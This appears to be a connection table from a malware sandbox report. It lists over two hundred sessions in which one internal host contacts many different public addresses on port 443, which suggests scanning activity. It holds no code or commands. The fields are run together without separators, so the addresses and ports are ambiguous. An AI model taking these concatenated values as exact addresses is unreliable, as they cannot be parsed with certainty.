                                                16398192.168.2.133678442.187.228.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16399192.168.2.1354618106.167.2.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16400192.168.2.133447889.28.129.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16401192.168.2.135252827.30.173.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16402192.168.2.135395094.161.83.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16403192.168.2.1334602103.137.226.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16404192.168.2.1349750141.176.210.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16405192.168.2.134472472.88.4.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16406192.168.2.1336764204.39.5.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16407192.168.2.1355436199.89.81.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16408192.168.2.1349216117.104.52.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16409192.168.2.135052639.52.78.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16410192.168.2.133590268.238.72.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16411192.168.2.135956614.233.232.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16412192.168.2.135167673.234.236.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16413192.168.2.1348246160.220.216.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16414192.168.2.134189431.42.99.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16415192.168.2.13329061.242.4.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16416192.168.2.135179865.180.120.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16417192.168.2.13594305.152.118.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16418192.168.2.1360696109.232.84.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16419192.168.2.133508040.72.170.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16420192.168.2.1348040106.127.82.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16421192.168.2.1353332145.66.245.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16422192.168.2.1349978105.79.141.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16423192.168.2.1345318136.229.188.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16424192.168.2.133469835.166.4.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16425192.168.2.1339466166.108.66.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16426192.168.2.134769025.152.76.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16427192.168.2.133651470.210.240.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16428192.168.2.1334518195.217.222.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16429192.168.2.135494842.155.128.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16430192.168.2.1355344190.81.250.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16431192.168.2.1339134107.180.6.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16432192.168.2.1348236133.82.95.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16433192.168.2.133512413.133.13.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16434192.168.2.1359414167.157.147.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16435192.168.2.1349422175.35.144.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16436192.168.2.1360686170.130.160.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16437192.168.2.1341104144.130.93.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16438192.168.2.1360948117.126.38.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16439192.168.2.1335276182.126.121.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16440192.168.2.1350842217.201.41.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16441192.168.2.1341904187.102.235.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16442192.168.2.1343364118.68.60.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16443192.168.2.136018488.23.218.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16444192.168.2.1347520131.240.119.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16445192.168.2.1356000149.162.113.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16446192.168.2.133440020.205.124.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16447192.168.2.135113437.160.41.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16448192.168.2.134422075.182.204.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16449192.168.2.1358254103.253.119.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16450192.168.2.1333496146.204.29.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16451192.168.2.1355022142.69.190.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16452192.168.2.1353936178.213.216.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16453192.168.2.1357874181.180.124.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16454192.168.2.13564725.239.127.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16455192.168.2.1340304106.249.209.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16456192.168.2.135090298.155.187.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16457192.168.2.136071084.2.209.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16458192.168.2.133378475.5.103.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16459192.168.2.1351974154.142.72.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16460192.168.2.135176842.55.164.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16461192.168.2.1350484104.129.36.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16462192.168.2.1341436108.233.63.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16463192.168.2.135865634.219.187.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16464192.168.2.1334836160.140.144.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16465192.168.2.1352432171.98.133.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16466192.168.2.133466070.179.158.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16467192.168.2.134158253.171.37.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16468192.168.2.134992892.234.13.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16469192.168.2.1345018144.225.131.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16470192.168.2.134560084.189.141.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16471192.168.2.1340586164.57.103.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16472192.168.2.136047017.238.50.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16473192.168.2.136016071.167.244.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16474192.168.2.1344848130.160.186.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16475192.168.2.1334264171.147.238.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16476192.168.2.1345372149.19.27.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16477192.168.2.1348236114.170.50.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16478192.168.2.1337626193.19.178.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16479192.168.2.1339476164.10.117.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16480192.168.2.133747642.113.250.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16481192.168.2.1334414141.243.182.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16482192.168.2.133575218.30.217.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16483192.168.2.1340014209.225.185.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16484192.168.2.1354242198.63.254.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16485192.168.2.135926249.255.148.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16486192.168.2.135162691.73.70.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16487192.168.2.134000848.61.125.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16488192.168.2.1357816141.73.136.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16489192.168.2.1339728179.46.174.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16490192.168.2.1346336152.41.116.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16491192.168.2.135863436.187.208.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16492192.168.2.135718096.90.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16493192.168.2.135477675.62.223.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16494192.168.2.1336414185.237.249.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16495192.168.2.1335912126.121.150.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16496192.168.2.1334736149.90.69.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16497192.168.2.1341336103.68.230.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16498192.168.2.1350756128.195.135.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16499192.168.2.1332802199.37.188.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16500192.168.2.1360148129.171.122.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16501192.168.2.1358460221.106.116.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16502192.168.2.1360952150.200.31.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16503192.168.2.1341904114.35.144.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16504192.168.2.133300613.117.187.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16505192.168.2.134412079.63.124.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16506192.168.2.133575212.2.65.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16507192.168.2.1345174142.139.10.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16508192.168.2.1338294134.162.180.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16509192.168.2.1355206146.105.116.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16510192.168.2.1337182133.158.198.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16511192.168.2.1346770173.46.65.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16512192.168.2.1340440165.38.217.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16513192.168.2.1347660170.106.152.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16514192.168.2.1345820152.28.139.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16515192.168.2.1341448199.86.58.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16516192.168.2.1342106148.62.25.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16517192.168.2.1346304110.84.255.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16518192.168.2.13501209.142.182.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16519192.168.2.1332924172.190.64.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16520192.168.2.1345716135.95.73.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16521192.168.2.1338676152.58.92.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16522192.168.2.1353804136.32.127.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16523192.168.2.1344134142.40.156.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16524192.168.2.134493242.100.82.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16525192.168.2.1346640134.225.79.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16526192.168.2.135524691.148.38.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16527192.168.2.1349812145.90.153.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16528192.168.2.1334800108.151.114.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16529192.168.2.1348014155.34.242.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16530192.168.2.1346952143.162.151.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16531192.168.2.1333712208.32.115.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16532192.168.2.1346260121.12.75.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16533192.168.2.1354832156.151.47.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16534192.168.2.134426271.142.71.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16535192.168.2.1333636199.242.79.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16536192.168.2.133735817.38.249.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16537192.168.2.13549609.48.34.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16538192.168.2.135500886.18.106.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16539192.168.2.1338600191.159.248.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16540192.168.2.133750235.78.104.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16541192.168.2.1341228116.67.225.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16542192.168.2.133671270.208.78.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16543192.168.2.1338970146.208.171.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16544192.168.2.1356600107.136.25.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16545192.168.2.133453627.95.145.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16546192.168.2.135147051.61.187.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16547192.168.2.1333996175.182.137.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16548192.168.2.1351194198.15.180.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16549192.168.2.1344594198.203.83.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16550192.168.2.1345698156.91.103.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16551192.168.2.136067664.138.125.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16552192.168.2.135315448.121.200.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16553192.168.2.1332790154.25.122.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16554192.168.2.1357350187.186.64.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16555192.168.2.1352618129.75.64.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16556192.168.2.1354922160.229.195.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16557192.168.2.1341230196.223.209.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16558192.168.2.134182879.73.187.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16559192.168.2.1357308219.83.11.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16560192.168.2.1349550209.248.212.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16561192.168.2.1333518144.15.251.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16562192.168.2.1338838126.246.70.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16563192.168.2.1345420180.126.223.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16564192.168.2.1334318111.28.41.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16565192.168.2.1354306107.13.133.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16566192.168.2.1333988202.158.240.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16567192.168.2.135788089.224.106.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16568192.168.2.135868260.3.235.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16569192.168.2.134966492.240.24.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16570192.168.2.1352348162.31.21.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16571192.168.2.1357140141.201.146.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16572192.168.2.1358486184.220.23.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16573192.168.2.1346070163.6.244.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16574192.168.2.135073657.54.25.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16575192.168.2.1349960166.216.76.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16576192.168.2.134948691.3.243.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16577192.168.2.136099635.115.15.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16578192.168.2.1358396136.53.109.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16579192.168.2.1347282194.51.47.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16580192.168.2.1353732192.87.96.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16581192.168.2.134604012.33.239.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16582192.168.2.1339016137.15.76.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16583192.168.2.1347296207.95.71.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16584192.168.2.1352350220.77.186.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16585192.168.2.135868232.121.108.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16586192.168.2.133323876.191.38.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16587192.168.2.134766036.238.176.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16588192.168.2.1345034147.168.240.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16589192.168.2.1337980201.101.43.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16590192.168.2.135799484.11.53.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16591192.168.2.135498095.146.41.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16592192.168.2.1349796145.130.143.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16593192.168.2.1338208108.220.42.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16594192.168.2.133469483.12.100.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16595192.168.2.1355730195.220.206.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16596192.168.2.1350118142.241.246.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16597192.168.2.135488883.111.239.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16598192.168.2.134847887.245.236.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16599192.168.2.1347766102.115.148.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16600192.168.2.135926083.229.130.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16601192.168.2.133293624.182.79.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16602192.168.2.1345720167.167.35.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16603192.168.2.1359904180.65.15.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16604192.168.2.133466272.174.48.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16605192.168.2.135183061.211.211.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16606192.168.2.1342552220.47.66.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16607192.168.2.1360628121.207.163.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16608192.168.2.13396329.224.127.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16609192.168.2.133619044.50.4.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16610192.168.2.1350306120.81.66.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16611192.168.2.1359266149.42.175.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16612192.168.2.1333052139.142.14.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16613192.168.2.135220418.81.199.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16614192.168.2.134819070.143.191.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16615192.168.2.1340638146.82.82.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16616192.168.2.135136088.160.236.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16617192.168.2.135877843.99.230.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16618192.168.2.134197845.60.211.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16619192.168.2.134390636.209.82.149443
                                                TimestampBytes transferredDirectionData


